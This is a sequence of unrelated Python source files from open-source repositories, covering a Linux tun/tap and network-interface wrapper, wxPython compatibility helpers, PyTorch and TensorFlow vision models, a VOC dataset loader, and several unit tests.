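#   r.rt_dev = "eth0"
#   payload = r.pack()   # buffer passed to ioctl(sock, SIOCADDRT, payload)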
class Interface (object):
"""
Simple interface to tun/tap driver
Currently only for Linux. IIRC, shouldn't be too hard to adapt for BSD.
Other OSes will probably need a fair amount of work.
"""
#TODO: Setters
def __init__ (self, name):
self._name = name
def __str__ (self):
return "%s('%s')" % (type(self).__name__, self.name)
@property
def name (self):
return self._name.rstrip("\0")
@name.setter
def name (self, value):
if len(value) > IFNAMESIZ: raise RuntimeError("Name too long")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += value
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFNAME, ifr)
self._name = value
@property
def ipv6_enabled (self):
f = file("/proc/sys/net/ipv6/conf/%s/disable_ipv6" % (self.name,), "r")
with f:
return f.read()[0] == "0" # Note inversion!
@ipv6_enabled.setter
def ipv6_enabled (self, value):
f = file("/proc/sys/net/ipv6/conf/%s/disable_ipv6" % (self.name,), "w")
with f:
f.write("0" if value else "1") # Note inversion!
@property
def ip_forwarding (self):
f = file("/proc/sys/net/ipv4/conf/%s/forwarding" % (self.name,), "r")
with f:
return f.read()[0] == "1"
@ip_forwarding.setter
def ip_forwarding (self, value):
f = file("/proc/sys/net/ipv4/conf/%s/forwarding" % (self.name,), "w")
with f:
f.write("1" if value else "0")
@property
def mtu (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFMTU, ifr)
return struct.unpack("I", ret[IFNAMESIZ:][:4])[0]
@mtu.setter
def mtu (self, value):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sI", self.name, value)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFMTU, ifr)
@property
def flags (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFFLAGS, ifr)
return struct.unpack("H", ret[IFNAMESIZ:IFNAMESIZ+2])[0]
@flags.setter
def flags (self, value):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sH", self.name, value)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFFLAGS, ifr)
def set_flags (self, flags, on=True):
if on:
self.flags |= flags
else:
self.unset_flags(flags)
def unset_flags (self, flags):
self.flags = self.flags & (flags ^ 0xffFF)
@property
def promiscuous (self):
return bool(self.flags & IFF_PROMISC)
@promiscuous.setter
def promiscuous (self, value):
self.set_flags(IFF_PROMISC, value)
@property
def is_up (self):
return (self.flags & IFF_UP) != 0
@is_up.setter
def is_up (self, value):
self.set_flags(IFF_UP, value)
@property
def is_running (self):
return (self.flags & IFF_RUNNING) != 0
@property
def arp_enabled (self):
return (self.flags & IFF_NOARP) == 0
@arp_enabled.setter
def arp_enabled (self, value):
self.set_flags(IFF_NOARP, not value)
@property
def ip_addr (self):
try:
return self._ioctl_get_ipv4(SIOCGIFADDR)
except IOError as e:
if e.errno == 99: return None
raise
@ip_addr.setter
def ip_addr (self, value):
return self._ioctl_set_ipv4(SIOCSIFADDR, value)
@property
def netmask (self):
try:
return self._ioctl_get_ipv4(SIOCGIFNETMASK)
except IOError as e:
if e.errno == 99: return None
raise
@netmask.setter
def netmask (self, value):
return self._ioctl_set_ipv4(SIOCSIFNETMASK, value)
@property
def broadcast_addr (self):
try:
return self._ioctl_get_ipv4(SIOCGIFBRDADDR)
except IOError as e:
if e.errno == 99: return None
raise
@broadcast_addr.setter
def broadcast_addr (self, value):
return self._ioctl_set_ipv4(SIOCSIFBRDADDR, value)
@property
def eth_addr (self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCGIFHWADDR, ifr)
sa = ret[IFNAMESIZ:] # sockaddr
return self._get_eth(sa)
@eth_addr.setter
def eth_addr (self, value):
value = EthAddr(value).raw
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sH", self.name, ARPHRD_ETHER)
ifr += value # Append to sockaddr
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, SIOCSIFHWADDR, ifr)
def _ioctl_get_ipv4 (self, which):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "s", self.name)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, which, ifr)
return self._get_ipv4(ret[IFNAMESIZ:])
def _ioctl_set_ipv4 (self, which, value):
value = IPAddr(value)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ifr = struct.pack(str(IFNAMESIZ) + "sHHI", self.name, socket.AF_INET, 0,
value.toUnsigned(networkOrder=True))
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(sock, which, ifr)
@staticmethod
def _get_ipv4 (sa):
sa_family = struct.unpack("H", sa[:2])[0]
if sa_family == socket.AF_INET:
return IPAddr(sa[4:8])
else:
raise RuntimeError("Unsupported hardware type %s for %s (expected %s)"
% (sa_family, self, socket.AF_INET))
@staticmethod
def _get_eth (sa):
sa_family = struct.unpack("H", sa[:2])[0]
if sa_family == ARPHRD_ETHER:
return EthAddr(sa[2:8])
else:
raise RuntimeError("Unsupported hardware type %s (expected %s)"
% (sa_family, ARPHRD_ETHER))
def add_default_route (self, *args, **kw):
return self.add_route("0.0.0.0/0", *args, **kw)
def add_route (self, network, gateway=None, dev=(), metric=0):
"""
Add routing table entry
If dev is unspecified, it defaults to this device
"""
return self._add_del_route(network, gateway, dev, metric, SIOCADDRT)
def del_route (self, network, gateway=None, dev=(), metric=0):
"""
Remove a routing table entry
If dev is unspecified, it defaults to this device
"""
return self._add_del_route(network, gateway, dev, metric, SIOCDELRT)
def _add_del_route (self, network, gateway=None, dev=(), metric=0,
command=None):
"""
Add or remove a routing table entry
If dev is unspecified, it defaults to this device
"""
r = rtentry()
if isinstance(network, tuple):
addr,mask = network
addr = str(addr)
if isinstance(mask, int):
mask = cidr_to_netmask(mask)
mask = str(mask)
network = "%s/%s" % (addr,mask)
host = False
if isinstance(network, IPAddr) or (isinstance(network, str)
and "/" not in network):
host = True
network,bits = parse_cidr(network)
r.rt_dst = network
r.rt_genmask = cidr_to_netmask(bits)
if gateway is not None:
r.rt_gateway = IPAddr(gateway)
r.rt_flags |= r.RTF_GATEWAY
r.rt_metric = metric
if dev is (): dev = self
if isinstance(dev, Interface): dev = dev.name
if dev: r.rt_dev = dev
if host: r.rt_flags |= r.RTF_HOST
r.rt_flags |= r.RTF_UP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
rv = ioctl(sock, command, r.pack())
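# Hypothetical usage sketch (not part of the original module): configuring an
# interface and adding routes with the properties defined above. This requires
# root privileges and a real interface name.
#
#   eth = Interface("eth0")
#   eth.ip_addr = "10.0.0.2"
#   eth.netmask = "255.255.255.0"
#   eth.is_up = True
#   eth.add_route("10.1.0.0/16", gateway="10.0.0.1")   # via this interface
#   eth.add_default_route(gateway="10.0.0.1")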
class TunTap (object):
"""
Simple wrapper for tun/tap interfaces
Looks like a file-like object. You should be able to read/write it, select
on it, etc.
"""
def __init__ (self, name=None, tun=False, raw=False):
"""
Create tun or tap
By default, it creates a new tun or tap with a default name. If you
specify a name, it will either try to create it (if it doesn't exist),
or try to use an existing interface (for which you must have permission).
Defaults to tap (Ethernet) mode. Specify tun=True for tun (IP) mode.
Specify raw=True to skip the 32 bits of flag/protocol metadata.
"""
if name is None: name = ""
openflags = os.O_RDWR
try:
openflags |= os.O_BINARY
except:
pass
self._f = os.open("/dev/net/tun", openflags)
# an ifreq is IFREQ_SIZE bytes long, starting with an interface name
# (IFNAMESIZ bytes) followed by a big union.
self.is_tun = tun
self.is_tap = not tun
self.is_raw = raw
flags = 0
if tun: flags |= IFF_TUN
else: flags |= IFF_TAP
if raw: flags |= IFF_NO_PI
ifr = struct.pack(str(IFNAMESIZ) + "sH", name, flags)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(self.fileno(), TUNSETIFF, ifr)
self.name = ret[:IFNAMESIZ]
iflags = flags
ifr = struct.pack(str(IFNAMESIZ) + "sH", name, 0)
ifr += "\0" * (IFREQ_SIZE - len(ifr))
ret = ioctl(self.fileno(), TUNGETIFF, ifr)
flags = struct.unpack("H", ret[IFNAMESIZ:IFNAMESIZ+2])[0]
self.is_tun = (flags & IFF_TUN) == IFF_TUN
self.is_tap = not self.is_tun
#self.is_raw = (flags & IFF_NO_PI) == IFF_NO_PI
def fileno (self):
return self._f
def write (self, data):
return os.write(self.fileno(), data)
def read (self, n):
return os.read(self.fileno(), n)
def close (self):
return os.close(self.fileno())
@property
def eth_addr (self):
return Interface(self.name).eth_addr
class RXData (Event):
"""
Event fired when an interface receives data
"""
def __init__ (self, interface, data):
self.interface = interface
self.data = data
class PCapInterface (Interface, EventMixin):
_eventMixin_events = set([
RXData,
])
def __init__ (self, name):
Interface.__init__(self, name)
EventMixin.__init__(self)
self._q = Queue()
p = PCap(name, callback=self._pcap_cb, start=False)
p.set_direction(True, False) # Incoming, not outgoing
p.start()
self.pcap = p
core.add_listener(self._handle_GoingDownEvent)
def _handle_GoingDownEvent (self, event):
self.close()
def send (self, data):
if self.pcap is None: return
self.pcap.inject(data)
def _pcap_cb (self, obj, data, sec, usec, length):
"""
Handles incoming data from pcap
This may not be on the right thread, so we just push it to a thread-safe
queue and poke the cooperative thread, which will pop it later.
"""
do_read = self._q.empty()
self._q.put((obj,data))
if do_read: core.callLater(self._queue_read)
def _queue_read (self):
anything = False
for _ in range(10): # at most 10 at once
try:
data = self._q.get(False)
self._q.task_done()
anything = True
except:
break
pcap,data = data
self.raiseEventNoErrors(RXData, self, data)
if anything:
# Check for remainders later
core.callLater(self._queue_read)
def __del__ (self):
self.close()
def close (self):
if self.pcap:
self.pcap.close()
self.pcap = None
class TapInterface (Interface, EventMixin):
_eventMixin_events = set([
RXData,
])
io_loop = None
max_read_size = 1600
default_send_protocol = None
def __init__ (self, name="", tun=False, raw=False, protocol=None):
self.tap = None
self.last_flags = None
self.last_protocol = None
if protocol: self.default_send_protocol = protocol
self.io_loop = ReadLoop.singleton
Interface.__init__(self, name)
EventMixin.__init__(self)
self.tap = TunTap(name, raw=raw, tun=tun)
if not name: self._name = self.tap.name
self.io_loop.add(self)
@property
def is_tap (self):
return self.tap.is_tap
@property
def is_tun (self):
return self.tap.is_tun
def send (self, data, flags=0, protocol=None):
if not self.tap.is_raw:
if protocol is None: protocol = self.default_send_protocol or 0
#FIXME: In the "0" case above, should we fall back to using the Etherype
# in the packet?
if flags or protocol:
flags = struct.pack("!HH", flags, protocol) # Flags reversed?
else:
flags = "\0\0\0\0"
data = flags + data
self.tap.write(data)
def _do_rx (self):
data = self.tap.read(self.max_read_size)
if not self.tap.is_raw:
flags,proto = struct.unpack("!HH", data[:4])
#FIXME: This may invert the flags...
self.last_flags = flags
self.last_protocol = proto
data = data[4:] # Cut off header
self.raiseEvent(RXData, self, data)
def fileno (self):
# Support fileno so that this can be used in IO loop directly
return self.tap.fileno()
def close (self):
if self.tap:
self.tap.close()
self.tap = None
self.io_loop.remove(self)
def __del__ (self):
self.close()
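# Hypothetical usage sketch (not part of the original module): creating a tap
# device and echoing received frames back out. This assumes /dev/net/tun access
# and a running POX core so that ReadLoop.singleton services the file descriptor.
#
#   tap = TapInterface("pox0")          # tap mode: raw Ethernet frames
#   def _on_rx(event):
#       # event.data is the received frame, event.interface the TapInterface
#       event.interface.send(event.data)
#   tap.addListener(RXData, _on_rx)
#   tap.ip_addr = "10.99.0.1"
#   tap.is_up = True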
|
wxtbx/wx4_compatibility.py | dperl-sol/cctbx_project | 155 | 17167 | <filename>wxtbx/wx4_compatibility.py
from __future__ import absolute_import, division, print_function
'''
Author : Lyubimov, A.Y.
Created : 04/14/2014
Last Changed: 11/05/2018
Description : wxPython 3-4 compatibility tools
The context managers, classes, and other tools below can be used to make the
GUI code compatible with wxPython 3 and 4. Mostly, the tools convert the
functions, enumerations, and classes which have been renamed in wxPython 4;
the name mismatches result in exceptions.
Use case 1: subclassing wx.PyControl or wx.Control:
from wxtbx import wx4_compatibility as wx4c
WxCtrl = wx4c.get_wx_mod(wx, wx.Control)
class MyCustomControl(WxCtrl): ...
Use case 2: brush style (NOTE: you can do that with fonts as well, but it
doesn't seem to be necessary):
from wxtbx import wx4_compatibility as wx4c
bkgrd = self.GetBackgroundColour()
with wx4c.set_brush_style(wx.BRUSHSTYLE_SOLID) as bstyle:
brush = wx.Brush(bkgrd, bstyle)
Use case 3: Toolbars
from wxtbx import wx4_compatibility as wx4c, bitmaps
class MyFrame(wx.Frame):
def __init__(self, parent, id, title, *args, **kwargs):
wx.Frame.__init__(self, parent, id, title, *args, **kwargs)
self.toolbar = wx4c.ToolBar(self, style=wx.TB_TEXT)
self.quit_button = self.toolbar.AddTool(toolId=wx.ID_ANY,
label='Quit',
kind=wx.ITEM_NORMAL,
bitmap=bitmaps.fetch_icon_bitmap('actions', 'exit')
shortHelp='Exit program')
...
self.SetToolBar(self.toolbar)
self.toolbar.Realize()
'''
import wx
from contextlib import contextmanager
import importlib
wx4 = wx.__version__[0] == '4'
modnames = [
('PyControl', 'Control'),
('PyDataObjectSimple', 'DataObjectSimple'),
('PyDropTarget', 'DropTarget'),
('PyEvtHandler', 'EvtHandler'),
('PyImageHandler', 'ImageHandler'),
('PyLocale', 'Locale'),
('PyLog', 'Log'),
('PyPanel', 'Panel'),
('PyPickerBase', 'PickerBase'),
('PyPreviewControlBar', 'PreviewControlBar'),
('PyPreviewFrame', 'PreviewFrame'),
('PyPrintPreview', 'PrintPreview'),
('PyScrolledWindow', 'ScrolledWindow'),
('PySimpleApp', 'App'),
('PyTextDataObject', 'TextDataObject'),
('PyTimer', 'Timer'),
('PyTipProvider', 'adv.TipProvider'),
('PyValidator', 'Validator'),
('PyWindow', 'Window')
]
font_families = [
(wx.DEFAULT, wx.FONTFAMILY_DEFAULT),
(wx.DECORATIVE, wx.FONTFAMILY_DECORATIVE),
(wx.ROMAN, wx.FONTFAMILY_ROMAN),
(wx.SCRIPT, wx.FONTFAMILY_SCRIPT),
(wx.SWISS, wx.FONTFAMILY_SWISS),
(wx.MODERN, wx.FONTFAMILY_MODERN),
(wx.TELETYPE, wx.FONTFAMILY_TELETYPE)
]
font_weights = [
(wx.NORMAL, wx.FONTWEIGHT_NORMAL),
(wx.LIGHT, wx.FONTWEIGHT_LIGHT),
(wx.BOLD, wx.FONTWEIGHT_BOLD)
]
font_styles = [
(wx.NORMAL, wx.FONTSTYLE_NORMAL),
(wx.ITALIC, wx.FONTSTYLE_ITALIC),
(wx.SLANT, wx.FONTSTYLE_SLANT)
]
pen_styles = [
(wx.SOLID, wx.PENSTYLE_SOLID),
(wx.DOT, wx.PENSTYLE_DOT),
(wx.LONG_DASH, wx.PENSTYLE_LONG_DASH),
(wx.SHORT_DASH, wx.PENSTYLE_SHORT_DASH),
(wx.DOT_DASH, wx.PENSTYLE_DOT_DASH),
(wx.USER_DASH, wx.PENSTYLE_USER_DASH),
(wx.TRANSPARENT, wx.PENSTYLE_TRANSPARENT)
]
brush_styles = [
(wx.SOLID, wx.BRUSHSTYLE_SOLID),
(wx.TRANSPARENT, wx.BRUSHSTYLE_TRANSPARENT),
(wx.STIPPLE_MASK_OPAQUE, wx.BRUSHSTYLE_STIPPLE_MASK_OPAQUE),
(wx.STIPPLE_MASK, wx.BRUSHSTYLE_STIPPLE_MASK),
(wx.STIPPLE, wx.BRUSHSTYLE_STIPPLE),
(wx.BDIAGONAL_HATCH, wx.BRUSHSTYLE_BDIAGONAL_HATCH),
(wx.CROSSDIAG_HATCH, wx.BRUSHSTYLE_CROSSDIAG_HATCH),
(wx.FDIAGONAL_HATCH, wx.BRUSHSTYLE_FDIAGONAL_HATCH),
(wx.CROSS_HATCH, wx.BRUSHSTYLE_CROSS_HATCH),
(wx.HORIZONTAL_HATCH, wx.BRUSHSTYLE_HORIZONTAL_HATCH),
(wx.VERTICAL_HATCH, wx.BRUSHSTYLE_VERTICAL_HATCH),
]
def find_module(module):
for m in modnames:
if module.__name__ in m:
return m
def find_enum(enums, item):
for en in enums:
if item in en:
value = en[1] if wx4 else en[0]
return value
def get_wx_mod(base, module):
mname = find_module(module)[1] if wx4 else find_module(module)[0]
bname = base.__name__
if '.' in mname:
spl = [i for i in mname.split('.') if i != bname]
modname = '.'.join(spl[:-1])
mod = importlib.import_module('{}.{}'.format(bname, modname))
return getattr(mod, spl[-1])
else:
return getattr(base, mname)
@contextmanager
def wx_mod(base, module):
''' Identify and import the appropriate wxPython module '''
yield get_wx_mod(base, module)
@contextmanager
def set_font_style(style):
yield find_enum(font_styles, style)
@contextmanager
def set_font_weight(weight):
yield find_enum(font_weights, weight)
@contextmanager
def set_font_family(family):
yield find_enum(font_families, family)
@contextmanager
def set_pen_style(style):
yield find_enum(pen_styles, style)
@contextmanager
def set_brush_style(style):
yield find_enum(brush_styles, style)
@contextmanager
def create_measuring_context():
dc = wx.GraphicsContext.Create() if wx4 else \
wx.GraphicsContext.CreateMeasuringContext()
yield dc
class Wx3ToolBar(wx.ToolBar):
''' Special toolbar class that accepts wxPython 4-style AddTool command and
converts it to a wxPython 3-style AddLabelTool command '''
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.TB_HORIZONTAL, name='toolbar'):
wx.ToolBar.__init__(self, parent, id, pos, size, style, name)
def AddTool(self, toolId, label, bitmap, bmpDisabled=wx.NullBitmap,
kind=wx.ITEM_NORMAL, shortHelp='', longHelp='',
clientData=None):
''' Override to make this a very thin wrapper for AddLabelTool, which in
wxPython 3 is the same as AddTool in wxPython 4 '''
return self.AddLabelTool(id=toolId, label=label, bitmap=bitmap,
bmpDisabled=bmpDisabled, kind=kind,
shortHelp=shortHelp, longHelp=longHelp,
clientData=clientData)
class Wx4ToolBar(wx.ToolBar):
''' Special toolbar class that accepts wxPython 3-style AddLabelTool command
and converts it to a wxPython 4-style AddTool command '''
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=wx.TB_HORIZONTAL, name='toolbar'):
wx.ToolBar.__init__(self, parent, id, pos, size, style, name)
def AddLabelTool(self, id, label, bitmap, bmpDisabled=wx.NullBitmap,
kind=wx.ITEM_NORMAL, shortHelp='', longHelp='',
clientData=None):
''' Override to make this a very thin wrapper for AddTool, which in
wxPython 4 is the same as AddLabelTool in wxPython 3 '''
return self.AddTool(toolId=id, label=label, bitmap=bitmap,
bmpDisabled=bmpDisabled, kind=kind,
shortHelp=shortHelp, longHelp=longHelp,
clientData=clientData)
# Use this ToolBar class to create toolbars in frames
ToolBar = Wx4ToolBar if wx4 else Wx3ToolBar
|
projects/TGS_salt/binary_classifier/model.py | liaopeiyuan/ml-arsenal-public | 280 | 17178 | <filename>projects/TGS_salt/binary_classifier/model.py
import torch.nn as nn
import pretrainedmodels
class classifier(nn.Module):
def __init__(self, model_name='resnet34'):
super(classifier, self).__init__()
# Load pretrained ImageNet model
self.model = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained='imagenet')
print(model_name + ' model settings:')
for var in pretrainedmodels.pretrained_settings[model_name]['imagenet']:
print('\t' + var + ': '+ str(pretrainedmodels.pretrained_settings[model_name]['imagenet'][var]))
# Define last layer for fine-tuning
dim_feats = self.model.last_linear.in_features
nb_classes = 1
self.model.last_linear = nn.Sequential(nn.Dropout(p=0.50), nn.Linear(dim_feats, nb_classes))  # dropout before the binary head
def forward(self, input):
return self.model(input)
def set_mode(self, mode):
self.mode = mode
if 'validation' in mode or 'test' in mode:
self.eval()
elif 'train' in mode:
self.train()
else:
raise NotImplementedError
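# Hypothetical usage sketch (not part of the original module): running the binary
# classifier on a dummy batch, assuming the dropout + linear head above and the
# 224x224 input size that resnet-style models in `pretrainedmodels` report.
#
#   import torch
#   net = classifier(model_name='resnet34')
#   net.set_mode('validation')
#   logits = net(torch.randn(2, 3, 224, 224))   # shape (2, 1)
#   probs = torch.sigmoid(logits)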
|
datasets/voc_dataset.py | ming71/DAL | 206 | 17180 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by <NAME>
# Extended by <NAME>
# --------------------------------------------------------
import os
import cv2
import numpy as np
import torch
import torch.utils.data as data
import xml.etree.ElementTree as ET
from utils.bbox import quad_2_rbox
class VOCDataset(data.Dataset):
""""""
def __init__(self,
dataset='trainval.txt',
augment = False,
level = 1,
random_flip=True):
self.image_set = dataset
# Dataset root: the image set file lives at <root>/ImageSets/Main/<split>.txt
self.data_path = os.path.dirname(os.path.dirname(os.path.dirname(self.image_set)))
self.image_ext = [".jpg"]
self.image_list = self._load_image_names()
self.classes = ('__background__', 'aeroplane','bicycle','bird','boat',
'bottle','bus','car','cat','chair','cow','diningtable',
'dog','horse','motorbike','person','pottedplant',
'sheep','sofa','train','tvmonitor')
self.num_classes = len(self.classes)
self.class_to_ind = dict(zip(self.classes, range(self.num_classes)))
self.random_flip = random_flip
def __len__(self):
return len(self.image_list)
def __getitem__(self, index):
im_path = self._image_path_from_index(self.image_list[index])
im = cv2.cvtColor(cv2.imread(im_path, cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
roidb = self._load_pascal_annotation(self.image_list[index])
gt_inds = np.where(roidb['gt_classes'] != 0)[0]
bboxes = roidb['boxes'][gt_inds, :]
classes = roidb['gt_classes'][gt_inds]
if self.random_flip and np.random.rand() >= 0.5:
im = cv2.flip(im, 1, None)
oldxs = bboxes[:, 0::2].copy()
bboxes[:, 0::2] = im.shape[1] - oldxs - 1
gt_boxes = np.empty((len(gt_inds), 6), dtype=np.float32)
for i, bbox in enumerate(bboxes):
gt_boxes[i, :5] = quad_2_rbox(np.array(bbox))
gt_boxes[i, 5] = classes[i]
return {'image': im, 'boxes': gt_boxes}
def _load_image_names(self):
"""
Load the names listed in this dataset's image set file.
"""
image_set_file = self.image_set
if not os.path.exists(image_set_file):
print('Path does not exist: {}'.format(image_set_file))
image_names = []
else:
with open(image_set_file) as f:
image_names = [x.strip() for x in f.readlines()]
return image_names
def _image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = None
image_exist = False
for image_ext in self.image_ext:
image_path = os.path.join(self.data_path, 'JPEGImages', index + image_ext)
if os.path.exists(image_path):
image_exist = True
break
if not image_exist:
raise Exception('Image path does not exist: {}'.format(
os.path.join(self.data_path, 'JPEGImages', index))
)
return image_path
def _load_pascal_annotation(self, index):
"""
Load image and bounding boxes info from XML file in the PASCAL VOC format.
"""
filename = os.path.join(self.data_path, 'Annotations', index + '.xml')
tree = ET.parse(filename)
objs = tree.findall('object')
boxes, gt_classes = [], []
for _, obj in enumerate(objs):
difficult = int(obj.find('difficult').text)
is_latin = obj.find('language') is None or obj.find('language').text == 'Latin'
bnd_box = obj.find('bndbox')
box = [
float(bnd_box.find('xmin').text),
float(bnd_box.find('ymin').text),
float(bnd_box.find('xmax').text),
float(bnd_box.find('ymin').text),
float(bnd_box.find('xmax').text),
float(bnd_box.find('ymax').text),
float(bnd_box.find('xmin').text),
float(bnd_box.find('ymax').text),
]
label = self.class_to_ind[obj.find('name').text.lower().strip()]
if difficult:
continue
# if self.only_latin and not is_latin:
# continue
boxes.append(box)
gt_classes.append(label)
return {'boxes': np.array(boxes, dtype=np.int32), 'gt_classes': np.array(gt_classes)}
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self._image_path_from_index(self.image_list[i])
def return_class(self, id):
id = int(id)
return self.classes[id]
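# Hypothetical usage sketch (not part of the original module): iterating over the
# dataset. The path below is a placeholder; each sample is a dict with the image
# and an (N, 6) array holding the rotated-box parameters from quad_2_rbox plus the
# class index in the last column.
#
#   ds = VOCDataset(dataset='/data/VOCdevkit/VOC2007/ImageSets/Main/trainval.txt')
#   sample = ds[0]
#   img, boxes = sample['image'], sample['boxes']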
if __name__ == '__main__':
pass |
tests/test_fid_score.py | jwblangley/pytorch-fid | 1,732 | 17226 | <filename>tests/test_fid_score.py
import numpy as np
import pytest
import torch
from PIL import Image
from pytorch_fid import fid_score, inception
@pytest.fixture
def device():
return torch.device('cpu')
def test_calculate_fid_given_statistics(mocker, tmp_path, device):
dim = 2048
m1, m2 = np.zeros((dim,)), np.ones((dim,))
sigma = np.eye(dim)
def dummy_statistics(path, model, batch_size, dims, device, num_workers):
if path.endswith('1'):
return m1, sigma
elif path.endswith('2'):
return m2, sigma
else:
raise ValueError
mocker.patch('pytorch_fid.fid_score.compute_statistics_of_path',
side_effect=dummy_statistics)
dir_names = ['1', '2']
paths = []
for name in dir_names:
path = tmp_path / name
path.mkdir()
paths.append(str(path))
fid_value = fid_score.calculate_fid_given_paths(paths,
batch_size=dim,
device=device,
dims=dim,
num_workers=0)
# Given equal covariance, FID is just the squared norm of difference
assert fid_value == np.sum((m1 - m2)**2)
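# Note (not part of the original tests): the general Frechet Inception Distance is
#   FID = ||mu1 - mu2||^2 + Tr(S1 + S2 - 2 * (S1 @ S2)^(1/2))
# With S1 == S2 == I as mocked above, the trace term vanishes, which is why the
# expected value reduces to the squared norm of the mean difference.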
def test_compute_statistics_of_path(mocker, tmp_path, device):
model = mocker.MagicMock(inception.InceptionV3)()
model.side_effect = lambda inp: [inp.mean(dim=(2, 3), keepdim=True)]
size = (4, 4, 3)
arrays = [np.zeros(size), np.ones(size) * 0.5, np.ones(size)]
images = [(arr * 255).astype(np.uint8) for arr in arrays]
paths = []
for idx, image in enumerate(images):
paths.append(str(tmp_path / '{}.png'.format(idx)))
Image.fromarray(image, mode='RGB').save(paths[-1])
stats = fid_score.compute_statistics_of_path(str(tmp_path), model,
batch_size=len(images),
dims=3,
device=device,
num_workers=0)
assert np.allclose(stats[0], np.ones((3,)) * 0.5, atol=1e-3)
assert np.allclose(stats[1], np.ones((3, 3)) * 0.25)
def test_compute_statistics_of_path_from_file(mocker, tmp_path, device):
model = mocker.MagicMock(inception.InceptionV3)()
mu = np.random.randn(5)
sigma = np.random.randn(5, 5)
path = tmp_path / 'stats.npz'
with path.open('wb') as f:
np.savez(f, mu=mu, sigma=sigma)
stats = fid_score.compute_statistics_of_path(str(path), model,
batch_size=1,
dims=5,
device=device,
num_workers=0)
assert np.allclose(stats[0], mu)
assert np.allclose(stats[1], sigma)
def test_image_types(tmp_path):
in_arr = np.ones((24, 24, 3), dtype=np.uint8) * 255
in_image = Image.fromarray(in_arr, mode='RGB')
paths = []
for ext in fid_score.IMAGE_EXTENSIONS:
paths.append(str(tmp_path / 'img.{}'.format(ext)))
in_image.save(paths[-1])
dataset = fid_score.ImagePathDataset(paths)
for img in dataset:
assert np.allclose(np.array(img), in_arr)
|
test/unit/test_finalize.py | phated/binaryen | 5,871 | 17235 | <reponame>phated/binaryen<filename>test/unit/test_finalize.py
from scripts.test import shared
from . import utils
class EmscriptenFinalizeTest(utils.BinaryenTestCase):
def do_output_test(self, args):
# without any output file specified, don't error, don't write the wasm,
# but do emit metadata
p = shared.run_process(shared.WASM_EMSCRIPTEN_FINALIZE + [
self.input_path('empty_lld.wat'), '--global-base=1024'
] + args, capture_output=True)
# metadata is always present
self.assertIn('{', p.stdout)
self.assertIn('}', p.stdout)
return p.stdout
def test_no_output(self):
stdout = self.do_output_test([])
# module is not present
self.assertNotIn('(module', stdout)
def test_text_output(self):
stdout = self.do_output_test(['-S'])
# module is present
self.assertIn('(module', stdout)
|
3rd party/YOLO_network.py | isaiasfsilva/ROLO | 962 | 17246 | import os
import numpy as np
import tensorflow as tf
import cv2
import time
import sys
import pickle
import ROLO_utils as util
class YOLO_TF:
fromfile = None
tofile_img = 'test/output.jpg'
tofile_txt = 'test/output.txt'
imshow = True
filewrite_img = False
filewrite_txt = False
disp_console = True
weights_file = 'weights/YOLO_small.ckpt'
alpha = 0.1
threshold = 0.08
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
w_img, h_img = [352, 240]
num_feat = 4096
num_predict = 6 # final output of LSTM 6 loc parameters
num_heatmap = 1024
def __init__(self,argvs = []):
self.argv_parser(argvs)
self.build_networks()
if self.fromfile is not None: self.detect_from_file(self.fromfile)
def argv_parser(self,argvs):
for i in range(1,len(argvs),2):
if argvs[i] == '-fromfile' : self.fromfile = argvs[i+1]
if argvs[i] == '-tofile_img' : self.tofile_img = argvs[i+1] ; self.filewrite_img = True
if argvs[i] == '-tofile_txt' : self.tofile_txt = argvs[i+1] ; self.filewrite_txt = True
if argvs[i] == '-imshow' :
if argvs[i+1] == '1' :self.imshow = True
else : self.imshow = False
if argvs[i] == '-disp_console' :
if argvs[i+1] == '1' :self.disp_console = True
else : self.disp_console = False
def build_networks(self):
if self.disp_console : print "Building YOLO_small graph..."
self.x = tf.placeholder('float32',[None,448,448,3])
self.conv_1 = self.conv_layer(1,self.x,64,7,2)
self.pool_2 = self.pooling_layer(2,self.conv_1,2,2)
